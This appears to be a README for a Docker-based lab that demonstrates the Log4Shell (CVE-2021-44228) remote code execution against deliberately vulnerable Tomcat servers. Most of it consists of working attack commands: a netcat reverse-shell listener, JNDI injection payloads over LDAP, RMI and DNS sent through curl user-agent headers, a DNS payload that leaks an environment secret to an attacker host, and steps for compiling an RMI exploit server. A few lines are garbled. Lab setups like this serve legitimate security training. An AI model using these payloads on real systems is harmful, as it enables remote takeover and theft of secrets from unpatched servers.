A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell
The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks.
The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc
This demo tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigued to use Log4J2 for logging - a non-standard configuration.
A newer Bitnami server is now available on port 8888. It is also is configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.
The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin
The detection script will check for user-agent vulnerablities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
This code requires Docker and Docker Compose
git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
# POC_ADDR is the address of the cve-poc container
# LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build
nc -lv 10.10.10.31 9001
docker-compose up
admin
password
${jndi:ldap://172.16.238.11:1389/a}
nc
listenernc -lv 10.10.10.31 9001
docker-compose up
curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell
docker-compose up
curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
I am having issues with command line arg for ping target. So you have to compile yourself.
docker-compose up
docker exec -it log4j-poc_cve-poc_1 /bin/bash
cd /home/user/rmi-poc
javac -cp catalina.jar:. RMIServerPOC.java
javac -cp catalina.jar:. RMIServerPOC 127.0.0.1
docker-compose up
curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2